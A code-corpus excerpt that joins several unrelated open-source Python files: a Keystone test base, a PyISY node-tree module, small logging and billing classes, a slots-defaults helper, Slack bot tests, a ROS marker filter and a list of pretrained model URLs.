if self._check_for_method_in_parents(self._testMethodName):
return super(BaseTestCase, self).skipTest(*args, **kwargs)
raise Exception('%r is not a previously defined test method'
% self._testMethodName)
def _check_for_method_in_parents(self, name):
# skip first to get to parents
for cls in self.__class__.__mro__[1:]:
if hasattr(cls, name):
return True
return False
def loadapp(self, name='public'):
app = flask_app.application_factory(name)
app.testing = True
app.test_client_class = KeystoneFlaskTestClient
# NOTE(morgan): any unexpected 404s, not handled by the routed apis,
# is a hard error and should not pass testing.
def page_not_found_teapot(e):
content = (
'TEST PROGRAMMING ERROR - Reached a 404 from an unrouted (`%s`'
') path. Be sure the test is requesting the right resource '
'and that all blueprints are registered with the flask app.' %
flask.request.url)
return content, 418
app.register_error_handler(404, page_not_found_teapot)
self.test_client = app.test_client
self.test_request_context = app.test_request_context
self.cleanup_instance('test_request_context')
self.cleanup_instance('test_client')
return keystone_flask.setup_app_middleware(app)
class TestCase(BaseTestCase):
def config_files(self):
return []
def _policy_fixture(self):
return ksfixtures.Policy(self.config_fixture)
@contextlib.contextmanager
def make_request(self, path='/', **kwargs):
# standup a fake app and request context with a passed in/known
# environment.
is_admin = kwargs.pop('is_admin', False)
environ = kwargs.setdefault('environ', {})
query_string = kwargs.pop('query_string', None)
if query_string:
# Make sure query string is properly added to the context
path = '{path}?{qs}'.format(path=path, qs=query_string)
if not environ.get(context.REQUEST_CONTEXT_ENV):
environ[context.REQUEST_CONTEXT_ENV] = context.RequestContext(
is_admin=is_admin,
authenticated=kwargs.pop('authenticated', True))
# Create a dummy flask app to work with
app = flask.Flask(__name__)
with app.test_request_context(path=path, environ_overrides=environ):
yield
def config_overrides(self):
# NOTE(morganfainberg): enforce config_overrides can only ever be
# called a single time.
assert self.__config_overrides_called is False
self.__config_overrides_called = True
signing_certfile = 'examples/pki/certs/signing_cert.pem'
signing_keyfile = 'examples/pki/private/signing_key.pem'
self.useFixture(self._policy_fixture())
self.config_fixture.config(
# TODO(morganfainberg): Make Cache Testing a separate test case
# in tempest, and move it out of the base unit tests.
group='cache',
backend='dogpile.cache.memory',
enabled=True,
proxies=['oslo_cache.testing.CacheIsolatingProxy'])
self.config_fixture.config(
group='catalog',
driver='sql',
template_file=dirs.tests('default_catalog.templates'))
self.config_fixture.config(
group='saml', certfile=signing_certfile, keyfile=signing_keyfile)
self.config_fixture.config(
default_log_levels=[
'amqp=WARN',
'amqplib=WARN',
'boto=WARN',
'qpid=WARN',
'sqlalchemy=WARN',
'suds=INFO',
'oslo.messaging=INFO',
'iso8601=WARN',
'requests.packages.urllib3.connectionpool=WARN',
'routes.middleware=INFO',
'stevedore.extension=INFO',
'keystone.notifications=INFO',
'keystone.identity.backends.ldap.common=INFO',
])
# NOTE(notmorgan): Set password rounds low here to ensure speedy
# tests. This is explicitly set because the tests here are not testing
# the integrity of the password hashing, just that the correct form
# of hashing has been used. Note that 4 is the lowest for bcrypt
# allowed in the `[identity] password_hash_rounds` setting
self.config_fixture.config(group='identity', password_hash_rounds=4)
self.useFixture(
ksfixtures.KeyRepository(
self.config_fixture,
'fernet_tokens',
CONF.fernet_tokens.max_active_keys
)
)
self.useFixture(
ksfixtures.KeyRepository(
self.config_fixture,
'fernet_receipts',
CONF.fernet_receipts.max_active_keys
)
)
def _assert_config_overrides_called(self):
assert self.__config_overrides_called is True
def setUp(self):
super(TestCase, self).setUp()
self.__config_overrides_called = False
self.__load_backends_called = False
self.config_fixture = self.useFixture(config_fixture.Config(CONF))
self.addCleanup(delattr, self, 'config_fixture')
self.config(self.config_files())
# NOTE(morganfainberg): mock the auth plugin setup to use the config
# fixture which automatically unregisters options when performing
# cleanup.
def mocked_register_auth_plugin_opt(conf, opt):
self.config_fixture.register_opt(opt, group='auth')
self.useFixture(fixtures.MockPatchObject(
keystone.conf.auth, '_register_auth_plugin_opt',
new=mocked_register_auth_plugin_opt))
self.config_overrides()
# explicitly load auth configuration
keystone.conf.auth.setup_authentication()
# NOTE(morganfainberg): ensure config_overrides has been called.
self.addCleanup(self._assert_config_overrides_called)
self.useFixture(fixtures.FakeLogger(level=log.DEBUG))
# NOTE(morganfainberg): This code is a copy from the oslo-incubator
# log module. This is not in a function or otherwise available to use
# without having a CONF object to setup logging. This should help to
# reduce the log size by limiting what we log (similar to how Keystone
# would run under mod_wsgi).
for pair in CONF.default_log_levels:
mod, _sep, level_name = pair.partition('=')
logger = log.getLogger(mod)
logger.logger.setLevel(level_name)
self.useFixture(ksfixtures.Cache())
# Clear the registry of providers so that providers from previous
# tests aren't used.
self.addCleanup(provider_api.ProviderAPIs._clear_registry_instances)
# Clear the registry of JSON Home Resources
self.addCleanup(json_home.JsonHomeResources._reset)
# Ensure Notification subscriptions and resource types are empty
self.addCleanup(notifications.clear_subscribers)
self.addCleanup(notifications.reset_notifier)
def config(self, config_files):
sql.initialize()
CONF(args=[], project='keystone', default_config_files=config_files)
def load_backends(self):
"""Initialize each manager and assigns them to an attribute."""
# TODO(morgan): Ensure our tests only ever call load_backends
# a single time via this method. for now just clear the registry
# if we are reloading.
provider_api.ProviderAPIs._clear_registry_instances()
self.useFixture(ksfixtures.BackendLoader(self))
def load_fixtures(self, fixtures):
"""Hacky basic and naive fixture loading based on a python module.
Expects that the various APIs into the various services are already
defined on `self`.
"""
# NOTE(dstanek): create a list of attribute names to be removed
# from this instance during cleanup
fixtures_to_cleanup = []
# TODO(termie): doing something from json, probably based on Django's
# loaddata will be much preferred.
if (hasattr(self, 'identity_api') and
hasattr(self, 'assignment_api') and
hasattr(self, 'resource_api')):
try:
PROVIDERS.resource_api.create_domain(
resource_base.NULL_DOMAIN_ID, fixtures.ROOT_DOMAIN)
except exception.Conflict:
# the root domain already exists, skip now.
pass
for domain in fixtures.DOMAINS:
rv = PROVIDERS.resource_api.create_domain(domain['id'], domain)
attrname = 'domain_%s' % domain['id']
setattr(self, attrname, rv)
fixtures_to_cleanup.append(attrname)
for project in fixtures.PROJECTS:
project_attr_name = 'project_%s' % project['name'].lower()
rv = PROVIDERS.resource_api.create_project(
project['id'], project)
setattr(self, project_attr_name, rv)
fixtures_to_cleanup.append(project_attr_name)
for role in fixtures.ROLES:
rv = PROVIDERS.role_api.create_role(role['id'], role)
attrname = 'role_%s' % role['name']
setattr(self, attrname, rv)
fixtures_to_cleanup.append(attrname)
for user in fixtures.USERS:
user_copy = user.copy()
projects = user_copy.pop('projects')
# For users, the manager layer will generate the ID
user_copy = PROVIDERS.identity_api.create_user(user_copy)
# Our tests expect that the password is still in the user
# record so that they can reference it, so put it back into
# the dict returned.
user_copy['password'] = user['password']
# fixtures.ROLES[2] is the _member_ role.
for project_id in projects:
PROVIDERS.assignment_api.add_role_to_user_and_project(
user_copy['id'], project_id, fixtures.ROLES[2]['id'])
# Use the ID from the fixture as the attribute name, so
# that our tests can easily reference each user dict, while
# the ID in the dict will be the real public ID.
attrname = 'user_%s' % user['name']
setattr(self, attrname, user_copy)
fixtures_to_cleanup.append(attrname)
for role_assignment in fixtures.ROLE_ASSIGNMENTS:
role_id = role_assignment['role_id']
user = role_assignment['user']
project_id = role_assignment['project_id']
user_id = getattr(self, 'user_%s' % user)['id']
PROVIDERS.assignment_api.add_role_to_user_and_project(
user_id, project_id, role_id)
self.addCleanup(self.cleanup_instance(*fixtures_to_cleanup))
def assertCloseEnoughForGovernmentWork(self, a, b, delta=3):
"""Assert that two datetimes are nearly equal within a small delta.
:param delta: Maximum allowable time delta, defined in seconds.
"""
if a == b:
# Short-circuit if the values are the same.
return
msg = '%s != %s within %s delta' % (a, b, delta)
self.assertLessEqual(abs(a - b).seconds, delta, msg)
def assertTimestampEqual(self, expected, value):
# Compare two timestamps but ignore the microseconds part
# of the expected timestamp. Keystone does not track microseconds and
# is working to eliminate microseconds from it's datetimes used.
expected = timeutils.parse_isotime(expected).replace(microsecond=0)
value = timeutils.parse_isotime(value).replace(microsecond=0)
self.assertEqual(
expected,
value,
"%s != %s" % (expected, value))
def assertNotEmpty(self, l):
self.assertGreater(len(l), 0)
def assertUserDictEqual(self, expected, observed, message=''):
"""Assert that a user dict is equal to another user dict.
User dictionaries have some variable values that should be ignored in
the comparison. This method is a helper that strips those elements out
when comparing the user dictionary. This normalized these differences
that should not change the comparison.
"""
# NOTE(notmorgan): An empty option list is the same as no options being
# specified in the user_ref. This removes options if it is empty in
# observed if options is not specified in the expected value.
if ('options' in observed and not observed['options'] and
'options' not in expected):
observed = observed.copy()
del observed['options']
self.assertDictEqual(expected, observed, message)
@property
def ipv6_enabled(self):
if socket.has_ipv6:
sock = None
try:
sock = socket.socket(socket.AF_INET6)
# NOTE(Mouad): Try to bind to IPv6 loopback ip address.
sock.bind(("::1", 0))
return True
except socket.error:
pass
finally:
if sock:
sock.close()
return False
def skip_if_no_ipv6(self):
if not self.ipv6_enabled:
raise self.skipTest("IPv6 is not enabled in the system")
class SQLDriverOverrides(object):
"""A mixin for consolidating sql-specific test overrides."""
def config_overrides(self):
super(SQLDriverOverrides, self).config_overrides()
# SQL specific driver overrides
self.config_fixture.config(group='catalog', driver='sql')
self.config_fixture.config(group='identity', driver='sql')
self.config_fixture.config(group='policy', driver='sql')
self.config_fixture.config(group='trust', driver='sql')
| 1.382813 | 1 |
PyISY/Nodes/__init__.py | sneelco/PyISY | 0 | 6985 | <filename>PyISY/Nodes/__init__.py
from .group import Group
from .node import (Node, parse_xml_properties, ATTR_ID)
from time import sleep
from xml.dom import minidom
class Nodes(object):
"""
This class handles the ISY nodes. This class can be used as a dictionary to
navigate through the controller's structure to objects of type
:class:`~PyISY.Nodes.Node` and :class:`~PyISY.Nodes.Group` that represent
objects on the controller.
| parent: ISY class
| root: [optional] String representing the current navigation level's ID
| nids: [optional] list of node ids
| nnames: [optional] list of node names
| nparents: [optional] list of node parents
| nobjs: [optional] list of node objects
| ntypes: [optional] list of node types
| xml: [optional] String of xml data containing the configuration data
:ivar allLowerNodes: Returns all nodes beneath current level
:ivar children: A list of the object's children.
:ivar hasChildren: Indicates if object has children
:ivar name: The name of the current folder in navigation.
"""
nids = []
nnames = []
nparents = []
nobjs = []
ntypes = []
def __init__(self, parent, root=None, nids=None, nnames=None,
nparents=None, nobjs=None, ntypes=None, xml=None):
self.parent = parent
self.root = root
if nids is not None and nnames is not None and nparents is not None \
and nobjs is not None and ntypes is not None:
self.nids = nids
self.nnames = nnames
self.nparents = nparents
self.nobjs = nobjs
self.ntypes = ntypes
elif xml is not None:
self.parse(xml)
def __str__(self):
""" Returns string representation of the nodes/folders/groups. """
if self.root is None:
return 'Folder <root>'
else:
ind = self.nids.index(self.root)
if self.ntypes[ind] == 'folder':
return 'Folder (' + self.root + ')'
elif self.ntypes[ind] == 'group':
return 'Group (' + self.root + ')'
else:
return 'Node (' + self.root + ')'
def __repr__(self):
""" Creates a pretty representation of the nodes/folders/groups. """
# get and sort children
folders = []
groups = []
nodes = []
for child in self.children:
if child[0] is 'folder':
folders.append(child)
elif child[0] is 'group':
groups.append(child)
elif child[0] is 'node':
nodes.append(child)
# initialize data
folders.sort(key=lambda x: x[1])
groups.sort(key=lambda x: x[1])
nodes.sort(key=lambda x: x[1])
out = str(self) + '\n' + self.__reprFolders__(folders) + \
self.__reprGroups__(groups) + self.__reprNodes__(nodes)
return out
def __reprFolders__(self, folders):
# format folders
out = ''
for fold in folders:
fold_obj = self[fold[2]]
out += ' + ' + fold[1] + ': Folder(' + fold[2] + ')\n'
for line in repr(fold_obj).split('\n')[1:]:
if len(line) > 0:
out += ' | ' + line + '\n'
out += ' -\n'
return out
def __reprGroups__(self, groups):
# format groups
out = ''
for group in groups:
out += ' ' + group[1] + ': Group(' + group[2] + ')\n'
return out
def __reprNodes__(self, nodes):
# format nodes
out = ''
for node in nodes:
node_obj = self[node[2]]
if node_obj.hasChildren:
out += ' + '
else:
out += ' '
out += node[1] + ': Node(' + node[2] + ')\n'
if node_obj.hasChildren:
for line in repr(node_obj).split('\n')[1:]:
if len(line) > 0:
out += ' | ' + line + '\n'
out += ' -\n'
return out
def __iter__(self):
"""
Returns an iterator for each node below the current navigation level.
"""
iter_data = self.allLowerNodes
return NodeIterator(self, iter_data, delta=1)
def __reversed__(self):
""" Returns the iterator in reverse order. """
iter_data = self.allLowerNodes
return NodeIterator(self, iter_data, delta=-1)
def _upmsg(self, xmldoc):
"""Updates nodes from event stream message."""
nid = xmldoc.getElementsByTagName('node')[0].firstChild.toxml()
nval = int(xmldoc.getElementsByTagName('action')[0].firstChild.toxml())
ctrl = xmldoc.getElementsByTagName('control')[0].firstChild.toxml()
try:
if ctrl == 'ST':
self.getByID(nid).status.update(nval, force=True, silent=True)
self.parent.log.info('ISY Updated Node: ' + nid)
else:
nid = '{}_{}'.format(nid, ctrl)
status = self.getByID(nid).status
status.update(nval, force=True, silent=True)
self.parent.log.info('ISY Updated Property: ' + nid)
except ValueError:
self.parent.log.warning('Unable to find node:: ' + nid)
def _controlmsg(self, xmldoc):
"""Passes Control events from an event stream message to nodes, for
sending out to subscribers."""
try:
nid = xmldoc.getElementsByTagName('node')[0].firstChild.toxml()
cntrl = xmldoc.getElementsByTagName('control')[0].firstChild.toxml()
except IndexError:
# If there is no node associated with the control message we ignore it
return
self.getByID(nid).controlEvents.notify(cntrl)
self.parent.log.info('ISY Node Control Event: ' + nid + ' ' + cntrl)
def parse(self, xml):
"""
Parses the xml data.
| xml: String of the xml data
"""
try:
xmldoc = minidom.parseString(xml)
except:
self.parent.log.error('ISY Could not parse nodes, '
+ 'poorly formatted XML.')
else:
# get nodes
ntypes = ['folder', 'node', 'group']
for ntype in ntypes:
features = xmldoc.getElementsByTagName(ntype)
for feature in features:
nid = feature.getElementsByTagName('address')[0] \
.firstChild.toxml()
nname = feature.getElementsByTagName('name')[0] \
.firstChild.toxml()
try:
nparent = feature.getElementsByTagName('parent')[0] \
.firstChild.toxml()
except IndexError:
nparent = None
try:
parent_nid = feature.getElementsByTagName('pnode')[0] \
.firstChild.toxml()
except IndexError:
parent_nid = None
try:
type = feature.getElementsByTagName('type')[0] \
.firstChild.toxml()
except IndexError:
type = None
try:
nodeDefId = feature.attributes['nodeDefId'].value
except KeyError:
nodeDefId = None
if ntype == 'folder':
self.insert(nid, nname, nparent, None, ntype)
elif ntype == 'node':
node_xml = self.parent.conn.getNode(nid)
node_doc = minidom.parseString(node_xml) # type: xml.dom.minidom.Document
node = node_doc.getElementsByTagName('node')[0]
(state_val, state_uom, state_prec,
aux_props) = parse_xml_properties(node_doc)
dimmable = '%' in state_uom
self.insert(nid, nname, nparent,
Node(self, nid, state_val, nname,
dimmable,
uom=state_uom, prec=state_prec,
aux_properties=aux_props,
node_def_id=nodeDefId,
parent_nid=parent_nid,
type=type),
ntype)
for id, prop in aux_props.items():
if id == 'ST':
continue
prop_id = '{}_{}'.format(nid, id)
prop_name = '{} {}'.format(nname, id)
self.insert(prop_id, prop_name, nparent,
Node(self, prop_id, prop['value'],
prop_name, False,
uom=prop['uom'],
prec=prop['prec']),
'property')
elif ntype == 'group':
flag = feature.attributes['flag'].value
# Ignore groups that contain 0x08 in the flag since that is a ISY scene that
# contains every device/scene so it will contain some scenes we have not
# seen yet so they are not defined and it includes the ISY MAC addrees in
# newer versions of ISY 5.0.6+ ..
if int(flag) & 0x08:
self.parent.log.info('Skipping group flag=' + flag + " " + nid )
else:
mems = feature.getElementsByTagName('link')
# Build list of members
members = [mem.firstChild.nodeValue for mem in mems]
# Build list of controllers
controllers = []
for mem in mems:
if int(mem.attributes['type'].value) == 16:
controllers.append(mem.firstChild.nodeValue)
self.insert(nid, nname, nparent,
Group(self, nid, nname, members, controllers), ntype)
self.parent.log.info('ISY Loaded Nodes')
def update(self, waitTime=0):
"""
Updates the contents of the class
| waitTime: [optional] Amount of seconds to wait before updating
"""
sleep(waitTime)
xml = self.parent.conn.updateNodes()
if xml is not None:
try:
xmldoc = minidom.parseString(xml)
except:
self.parent.log.error('ISY Could not parse nodes, '
+ 'poorly formatted XML.')
else:
for feature in xmldoc.getElementsByTagName('node'):
nid = feature.attributes['id'].value
(state_val, state_uom, state_prec,
aux_props) = parse_xml_properties(feature)
dimmable = '%' in state_uom
if nid in self.nids:
node = self.getByID(nid)
node.uom = state_uom
node.prec = state_prec
node.dimmable = dimmable
node.status.update(state_val, silent=True)
if len(node.aux_properties) > 0:
node_xml = self.parent.conn.getNode(nid)
node_doc = minidom.parseString(node_xml)
(state_val, state_uom, state_prec,
aux_props) = parse_xml_properties(node_doc)
for key in aux_props.keys():
pid = '{}_{}'.format(nid, key)
prop = self.getByID(pid)
prop.status.update(prop['value'], )
else:
node = Node(self, id, state_val, ' ', dimmable,
uom=state_uom, prec=state_prec,
aux_properties=aux_props)
self.insert(id, ' ', None, node, 'node')
self.parent.log.info('ISY Updated Nodes')
else:
self.parent.log.warning('ISY Failed to update nodes.')
def insert(self, nid, nname, nparent, nobj, ntype):
"""
Inserts a new node into the lists.
| nid: node id
| nname: node name
| nparent: node parent
| nobj: node object
| ntype: node type
"""
self.nids.append(nid)
self.nnames.append(nname)
self.nparents.append(nparent)
self.ntypes.append(ntype)
self.nobjs.append(nobj)
def __getitem__(self, val):
"""
Used for navigating through the node tree. Can take names or IDs.
"""
try:
self.nids.index(val)
fun = self.getByID
except ValueError:
try:
self.nnames.index(val)
fun = self.getByName
except ValueError:
try:
val = int(val)
fun = self.getByInd
except ValueError:
fun = None
if fun:
try:
output = fun(val)
except:
pass
if output:
return output
raise KeyError('Unrecognized Key: [' + val + ']')
def __setitem__(self, val):
return None
def getByName(self, val):
"""
Gets child object with the given name.
| val: String representing name to look for.
"""
for i in range(len(self.nids)):
if self.nparents[i] == self.root and self.nnames[i] == val:
return self.getByInd(i)
def getByID(self, nid):
"""
Gets object with the given ID.
| nid: Integer representing node/group/folder id.
"""
i = self.nids.index(nid)
return self.getByInd(i)
def getByInd(self, i):
"""
Returns the object at the given index in the list.
| i: Integer representing index of node/group/folder.
"""
if self.ntypes[i] in ['group', 'node', 'property']:
return self.nobjs[i]
return Nodes(self.parent, self.nids[i], self.nids, self.nnames,
self.nparents, self.nobjs, self.ntypes)
def parseNotes(self, notes_xml):
spoken = None
if notes_xml is not None and notes_xml != "":
try:
notesdom = minidom.parseString(notes_xml)
except:
self.parent.log.error('ISY Could not parse node, notes '
+ 'poorly formatted XML: ' + notes_xml)
else:
spoken_tag = notesdom.getElementsByTagName('spoken')
if spoken_tag and len(spoken_tag) > 0 and spoken_tag[0].firstChild is not None:
spoken = spoken_tag[0].firstChild.toxml()
return { "spoken": spoken }
@property
def children(self):
out = []
for i in range(len(self.nids)):
if self.nparents[i] == self.root:
out.append((self.ntypes[i], self.nnames[i], self.nids[i]))
return out
@property
def hasChildren(self):
try:
self.nparents.index(self.root)
return True
except:
return False
@property
def name(self):
if self.root is None:
return ''
else:
ind = self.nids.index(self.root)
return self.nnames[ind]
@property
def allLowerNodes(self):
output = []
myname = self.name + '/'
for dtype, name, ident in self.children:
if dtype in ['group', 'node', 'property']:
output.append((dtype, myname + name, ident))
else:
output += [(dtype2, myname + name2, ident2)
for (dtype2, name2, ident2)
in self[ident].allLowerNodes]
return output
class NodeIterator(object):
""" Iterates through a list of nodes, returning node objects. """
def __init__(self, parent, iter_data, delta=1):
self._parent = parent
self._iterdata = iter_data
self._len = len(iter_data)
self._delta = delta
if delta > 0:
self._ind = 0
else:
self._ind = self._len - 1
def __next__(self):
if self._ind >= self._len or self._ind < 0:
raise StopIteration
_, path, ident = self._iterdata[self._ind]
self._ind += self._delta
return (path, self._parent[ident])
def __len__(self):
return self._len
| 2.671875 | 3 |
easyCore/Utils/Logging.py | easyScience/easyCore | 2 | 6986 | <gh_stars>1-10
# SPDX-FileCopyrightText: 2021 easyCore contributors <<EMAIL>>
# SPDX-License-Identifier: BSD-3-Clause
# © 2021 Contributors to the easyCore project <https://github.com/easyScience/easyCore>
__author__ = 'github.com/wardsimon'
__version__ = '0.1.0'
import logging
class Logger:
def __init__(self, log_level: int = logging.INFO):
self.logger = logging.getLogger(__name__)
self.level = log_level
self.logger.setLevel(self.level)
def getLogger(self, logger_name, color: str = '32', defaults: bool = True) -> logging:
"""
Create a logger
:param color:
:param logger_name: logger name. Usually __name__ on creation
:param defaults: Do you want to associate any current file loggers with this logger
:return: A logger
"""
logger = logging.getLogger(logger_name)
logger.setLevel(self.level)
# self.applyLevel(logger)
# for handler_type in self._handlers:
# for handler in self._handlers[handler_type]:
# if handler_type == 'sys' or defaults:
# handler.formatter._fmt = self._makeColorText(color)
# logger.addHandler(handler)
# logger.propagate = False
# self._loggers.append(logger)
return logger
| 2.359375 | 2 |
iqoptionapi/http/billing.py | mustx1/MYIQ | 3 | 6987 | """Module for IQ option billing resource."""
from iqoptionapi.http.resource import Resource
class Billing(Resource):
"""Class for IQ option billing resource."""
# pylint: disable=too-few-public-methods
url = "billing"
| 1.632813 | 2 |
defaultsob/core.py | honewatson/defaults | 0 | 6988 | # -*- coding: utf-8 -*-
def ordered_set(iter):
"""Creates an ordered set
@param iter: list or tuple
@return: list with unique values
"""
final = []
for i in iter:
if i not in final:
final.append(i)
return final
def class_slots(ob):
"""Get object attributes from child class attributes
@param ob: Defaults object
@type ob: Defaults
@return: Tuple of slots
"""
current_class = type(ob).__mro__[0]
if not getattr(current_class, 'allslots', None) \
and current_class != object:
_allslots = [list(getattr(cls, '__slots__', []))
for cls in type(ob).__mro__]
_fslots = []
for slot in _allslots:
_fslots = _fslots + slot
current_class.allslots = tuple(ordered_set(_fslots))
return current_class.allslots
def use_if_none_cls(alternative_attr):
def use_if_none(original_attr, ob, kwargs):
"""
Try and get a value from kwargs for original_attr. If there
is no original_attr in kwargs use the alternative_attr value
in the object ob
@param alternative_attr: the alternative attribute
@param original_attr: the original attribute
@param ob: the object with the attributes
@param kwargs: key values
@return: final value
"""
return kwargs.get(original_attr, getattr(ob, alternative_attr, None))
return use_if_none
def usef(attr):
"""Use another value as default
@param attr: the name of the attribute to
use as alternative value
@return: value of alternative attribute
"""
return use_if_none_cls(attr)
use_name_if_none = usef('Name')
def choose_alt(attr, ob, kwargs):
"""If the declared class attribute of ob is callable
then use that callable to get a default ob
instance value if a value is not available in kwargs.
@param attr: ob class attribute name
@param ob: the object instance whose default value needs to be set
@param kwargs: the kwargs values passed to the ob __init__ method
@return: value to be used to set ob instance
"""
result = ob.__class__.__dict__.get(attr, None)
if type(result).__name__ == "member_descriptor":
result = None
elif callable(result):
result = result(attr, ob, kwargs)
return result
class Defaults(object):
"""A base class which allows using slots to define
attributes and the ability to set object
instance defaults at the child class level"""
def __init__(self, **kwargs):
"""Assign kwargs to attributes and defaults to attributes"""
allslots = class_slots(self)
for attr in allslots:
setattr(self, attr, kwargs.get(
attr, choose_alt(attr, self, kwargs)))
def to_dict(self):
"""Returns attributes with values as dict
@return: dictionary of attributes with values
"""
allslots = class_slots(self)
return {
item: getattr(self, item, None)
for item in allslots
}
def to_dict_clean(self):
"""Return a dict where there values of None
are not included
@return: dict of the object properties with values
"""
attribs = self.to_dict()
return {
k: v
for k, v in attribs.items() if v
}
| 3.46875 | 3 |
tests/bot_test.py | item4/yui | 36 | 6989 | import asyncio
from collections import defaultdict
from datetime import timedelta
import pytest
from yui.api import SlackAPI
from yui.bot import Bot
from yui.box import Box
from yui.types.slack.response import APIResponse
from yui.utils import json
from .util import FakeImportLib
def test_bot_init(event_loop, monkeypatch, bot_config):
importlib = FakeImportLib()
monkeypatch.setattr('importlib.import_module', importlib.import_module)
bot_config.APPS = ['yui.app1', 'yui.app2']
box = Box()
bot = Bot(bot_config, event_loop, using_box=box)
assert bot.config == bot_config
assert bot.channels == []
assert bot.ims == []
assert bot.groups == []
assert bot.restart is False
assert isinstance(bot.api, SlackAPI)
assert bot.box is box
assert isinstance(bot.queue, asyncio.Queue)
assert importlib.import_queue == [
'yui.app1',
'yui.app2',
]
@pytest.mark.asyncio
async def test_call(event_loop, bot_config, response_mock):
token = 'asdf<PASSWORD>'
response_mock.post(
'https://slack.com/api/test11',
body=json.dumps({'res': 'hello world!'}),
headers={'content-type': 'application/json'},
status=200,
)
response_mock.post(
'https://slack.com/api/test12',
body=json.dumps({'res': 'hello world!', 'data': {'extra': 'wow'}}),
headers={'content-type': 'application/json'},
status=200,
)
response_mock.post(
'https://slack.com/api/test21',
body=json.dumps({'error': 'aaa'}),
headers={'content-type': 'application/json'},
status=404,
)
response_mock.post(
'https://slack.com/api/test22',
body=json.dumps({'error': 'aaa'}),
headers={'content-type': 'application/json'},
status=404,
)
response_mock.post(
'https://slack.com/api/test3',
body=json.dumps({'res': 'hello world!'}),
headers={'content-type': 'application/json'},
status=200,
)
box = Box()
bot = Bot(bot_config, event_loop, using_box=box)
bot.api.throttle_interval = defaultdict(lambda: timedelta(0))
res = await bot.call('test11')
assert res == APIResponse(
body={'res': 'hello world!'},
status=200,
headers={'content-type': 'application/json'},
)
res = await bot.call('test12', data={'extra': 'wow'})
assert res == APIResponse(
body={'res': 'hello world!', 'data': {'extra': 'wow'}},
status=200,
headers={'content-type': 'application/json'},
)
res = await bot.call('test21')
assert res == APIResponse(
body={'error': 'aaa'},
status=404,
headers={'content-type': 'application/json'},
)
res = await bot.call('test22', data={'extra': 'wow'})
assert res == APIResponse(
body={'error': 'aaa'},
status=404,
headers={'content-type': 'application/json'},
)
res = await bot.call('test3', token=token)
assert res == APIResponse(
body={'res': 'hello world!'},
status=200,
headers={'content-type': 'application/json'},
)
| 1.945313 | 2 |
scripts/marker_filter.py | CesMak/aruco_detector_ocv | 12 | 6990 | <reponame>CesMak/aruco_detector_ocv
#!/usr/bin/env python
import numpy as np
import rospy
import geometry_msgs.msg
import tf2_ros
from tf.transformations import quaternion_slerp
def translation_to_numpy(t):
return np.array([t.x, t.y, t.z])
def quaternion_to_numpy(q):
return np.array([q.x, q.y, q.z, q.w])
if __name__ == '__main__':
rospy.init_node('marker_filter')
alpha = rospy.get_param('~alpha', 0.9)
parent_frame_id = rospy.get_param('~parent_frame_id', 'kinect2_link')
marker_id = rospy.get_param('~marker_id', 'marker_id0')
marker_filtered_id = rospy.get_param(
'~marker_filtered_id', 'marker_id0_filtered')
rate_value = rospy.get_param('~rate_value', 125)
tfBuffer = tf2_ros.Buffer()
listener = tf2_ros.TransformListener(tfBuffer)
br = tf2_ros.TransformBroadcaster()
marker_pose = None
marker_pose0 = None
rate = rospy.Rate(rate_value)
while not rospy.is_shutdown():
marker_pose0 = marker_pose
# Lookup the transform
try:
marker_pose_new = tfBuffer.lookup_transform(
parent_frame_id, marker_id, rospy.Time())
if not marker_pose_new is None:
marker_pose = marker_pose_new
except (tf2_ros.LookupException, tf2_ros.ConnectivityException, tf2_ros.ExtrapolationException) as e:
rospy.logwarn(e)
if marker_pose is None:
rate.sleep()
continue
# Apply running average filter to translation and rotation
if not marker_pose0 is None:
rotation0 = quaternion_to_numpy(marker_pose0.transform.rotation)
rotation = quaternion_to_numpy(marker_pose.transform.rotation)
rotation_interpolated = quaternion_slerp(
rotation0, rotation, 1 - alpha)
translation0 = translation_to_numpy(
marker_pose0.transform.translation)
translation = translation_to_numpy(
marker_pose.transform.translation)
translation = alpha * translation0 + (1 - alpha) * translation
# Update pose of the marker
marker_pose.transform.rotation.x = rotation_interpolated[0]
marker_pose.transform.rotation.y = rotation_interpolated[1]
marker_pose.transform.rotation.z = rotation_interpolated[2]
marker_pose.transform.rotation.w = rotation_interpolated[3]
marker_pose.transform.translation.x = translation[0]
marker_pose.transform.translation.y = translation[1]
marker_pose.transform.translation.z = translation[2]
# Create new transform and broadcast it
t = geometry_msgs.msg.TransformStamped()
t.header.stamp = rospy.Time.now()
t.header.frame_id = parent_frame_id
t.child_frame_id = marker_filtered_id
t.transform = marker_pose.transform
br.sendTransform(t)
rate.sleep()
| 2.109375 | 2 |
src/backbone/utils.py | hankyul2/FaceDA | 20 | 6991 | <filename>src/backbone/utils.py
import os
import subprocess
from pathlib import Path
from torch.hub import load_state_dict_from_url
import numpy as np
model_urls = {
# ResNet
'resnet18': 'https://download.pytorch.org/models/resnet18-f37072fd.pth',
'resnet34': 'https://download.pytorch.org/models/resnet34-b627a593.pth',
'resnet50': 'https://download.pytorch.org/models/resnet50-0676ba61.pth',
'resnet101': 'https://download.pytorch.org/models/resnet101-63fe2227.pth',
'resnet152': 'https://download.pytorch.org/models/resnet152-394f9c45.pth',
'resnext50_32x4d': 'https://download.pytorch.org/models/resnext50_32x4d-7cdf4587.pth',
'resnext101_32x8d': 'https://download.pytorch.org/models/resnext101_32x8d-8ba56ff5.pth',
'wide_resnet50_2': 'https://download.pytorch.org/models/wide_resnet50_2-95faca4d.pth',
'wide_resnet101_2': 'https://download.pytorch.org/models/wide_resnet101_2-32ee1156.pth',
# MobileNetV2
'mobilenet_v2': 'https://download.pytorch.org/models/mobilenet_v2-b0353104.pth',
# Se ResNet
'seresnet18': 'https://github.com/rwightman/pytorch-image-models/releases/download/v0.1-weights/seresnet18-4bb0ce65.pth',
'seresnet34': 'https://github.com/rwightman/pytorch-image-models/releases/download/v0.1-weights/seresnet34-a4004e63.pth',
'seresnet50': 'https://github.com/rwightman/pytorch-image-models/releases/download/v0.1-cadene/se_resnet50-ce0d4300.pth',
'seresnet101': 'https://github.com/rwightman/pytorch-image-models/releases/download/v0.1-cadene/se_resnet101-7e38fcc6.pth',
'seresnet152': 'https://github.com/rwightman/pytorch-image-models/releases/download/v0.1-cadene/se_resnet152-d17c99b7.pth',
'seresnext50_32x4d': 'http://data.lip6.fr/cadene/pretrainedmodels/se_resnext50_32x4d-a260b3a4.pth',
# ViT
'vit_base_patch16_224': 'https://storage.googleapis.com/vit_models/imagenet21k/ViT-B_16.npz',
'vit_base_patch32_224': 'https://storage.googleapis.com/vit_models/imagenet21k/ViT-B_32.npz',
